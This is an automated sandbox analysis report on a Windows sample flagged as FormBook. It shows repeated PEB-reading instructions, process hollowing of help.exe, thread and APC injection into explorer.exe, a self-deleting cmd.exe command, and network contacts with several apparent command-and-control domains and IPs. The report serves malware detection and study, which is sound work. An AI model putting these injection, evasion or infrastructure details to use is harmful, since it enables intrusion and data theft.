          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B82D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B82D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B82D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B82D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B78DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00ADD5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00ADD5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B8FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B8FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B8FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B8FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B46DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B46DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B46DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B46DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B46DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B46DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B8E539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B4A537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B98D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AF4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AF4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AF4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AD3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AD3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AD3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AD3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AD3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AD3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AD3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AD3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AD3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AD3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AD3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AD3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AD3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00ACAD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AEC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AEC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B03D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B43540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B73D40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AE7D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B446A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B90EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B90EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B90EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B5FE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AF16E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AD76E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AF36CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B98ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B7FEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B08EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B7FE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00ACE620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00ACC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00ACC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00ACC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AF8E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B81608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AFA61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AFA61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AD766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AEAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AEAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AEAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AEAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AEAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AD7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AD7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AD7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AD7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AD7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AD7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B8AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B8AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B47794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B47794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B47794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AD8794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B037F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AC4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AC4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AEB73D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AEB73D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AFE730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AFA70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AFA70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B5FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B5FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B9070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B9070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AEF716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00ADFF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B98F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00ADEF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02FB4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02FB4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02FB4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02FB4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02FB4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02FB4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02FB4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02FB4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02FB4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02FB4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02FB4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02FB4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02FB4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02FB4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02F22AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02F22ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02F0AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02F0AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02F2FAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02EF52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02EF52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02EF52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02EF52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02EF52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02F2D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02F2D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02F3927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02FAB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02FAB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02FC8A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02FBEA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02EF9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02EF9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02EF9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02EF9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02F84257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02F1B236 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02F1B236 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02F1B236 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02F1B236 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02F1B236 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02F1B236 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02F1A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02F1A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02F1A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02F1A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02F1A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02F1A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02F1A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02F1A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02F1A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02F34A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02F34A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02F13A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02FBAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02FBAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02EFAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02EFAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02F08A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02EF5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02EF5210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02EF5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02EF5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02F203E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02F203E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02F203E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02F203E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02F203E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02F203E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02F1DBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02FA23E3 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02FA23E3 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02FA23E3 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02F253C5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02F753CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02F753CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02FC5BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02F24BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02F24BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02F24BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02F2B390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02F22397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02F1EB9A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02F1EB9A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02FB138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02F2138B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02F2138B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02F2138B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02FAD380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02F01B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02F01B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02F23B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02F23B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02EFDB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02FC8B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02EFDB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02EFF358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02FB131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02F1A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02F1A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02F1A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02F1A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02F1A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02F1A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02F1A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02F1A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02F1A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\help.exeProcess token adjusted: Debug

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeNetwork Connect: 104.21.89.72 80
          Source: C:\Windows\explorer.exeNetwork Connect: 173.234.255.253 80
          Source: C:\Windows\explorer.exeDomain query: www.starflexacademy.com
          Source: C:\Windows\explorer.exeDomain query: www.dndemystified.com
          Source: C:\Windows\explorer.exeDomain query: www.meganfantastic.com
          Source: C:\Windows\explorer.exeDomain query: www.candydulce.com
          Source: C:\Windows\explorer.exeDomain query: www.ezonkorea.com
          Source: C:\Windows\explorer.exeNetwork Connect: 3.143.65.214 80
          Source: C:\Windows\explorer.exeNetwork Connect: 45.195.169.197 80
          Source: C:\Windows\explorer.exeNetwork Connect: 3.34.12.41 80
          Source: C:\Windows\explorer.exeNetwork Connect: 104.18.193.20 80
          Source: C:\Windows\explorer.exeNetwork Connect: 107.180.57.111 80
          Source: C:\Windows\explorer.exeDomain query: www.take-me-bergen.com
          Source: C:\Windows\explorer.exeDomain query: www.insurancedowntown.com
          Source: C:\Windows\explorer.exeDomain query: www.obi4ex.com
          Source: C:\Windows\explorer.exeNetwork Connect: 172.67.206.33 80
          Source: C:\Windows\explorer.exeDomain query: www.ladorreguita.com
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeSection loaded: unknown target: C:\Users\user\Desktop\KY4cmAI0jU.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeSection loaded: unknown target: C:\Windows\SysWOW64\help.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeSection loaded: unknown target: C:\Windows\SysWOW64\help.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\help.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\help.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeThread register set: target process: 3388
          Source: C:\Windows\SysWOW64\help.exeThread register set: target process: 3388
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeThread APC queued: target process: C:\Windows\explorer.exe
          Sample uses process hollowing techniqueShow sources
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeSection unmapped: C:\Windows\SysWOW64\help.exe base address: B80000
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeProcess created: C:\Users\user\Desktop\KY4cmAI0jU.exe 'C:\Users\user\Desktop\KY4cmAI0jU.exe'
          Source: C:\Windows\SysWOW64\help.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\KY4cmAI0jU.exe'
          Source: explorer.exe, 00000002.00000000.244267378.0000000001398000.00000004.00000020.sdmpBinary or memory string: ProgmanamF
          Source: explorer.exe, 00000002.00000000.244805482.0000000001980000.00000002.00000001.sdmp, help.exe, 00000006.00000002.483227631.00000000054F0000.00000002.00000001.sdmpBinary or memory string: Program Manager
          Source: explorer.exe, 00000002.00000000.235214151.000000000871F000.00000004.00000001.sdmp, help.exe, 00000006.00000002.483227631.00000000054F0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000002.00000000.244805482.0000000001980000.00000002.00000001.sdmp, help.exe, 00000006.00000002.483227631.00000000054F0000.00000002.00000001.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000002.00000000.244805482.0000000001980000.00000002.00000001.sdmp, help.exe, 00000006.00000002.483227631.00000000054F0000.00000002.00000001.sdmpBinary or memory string: Progmanlock
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 0_2_00405B88 GetVersion,GetSystemDirectoryA,GetWindowsDirectoryA,SHGetSpecialFolderLocation,SHGetPathFromIDListA,CoTaskMemFree,lstrcatA,lstrlenA,

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000006.00000002.479659636.0000000000B20000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.266058058.00000000009E0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.218657751.0000000002170000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.477991027.0000000000560000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.265737304.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.266028847.00000000009B0000.00000040.00000001.sdmp, type: MEMORY
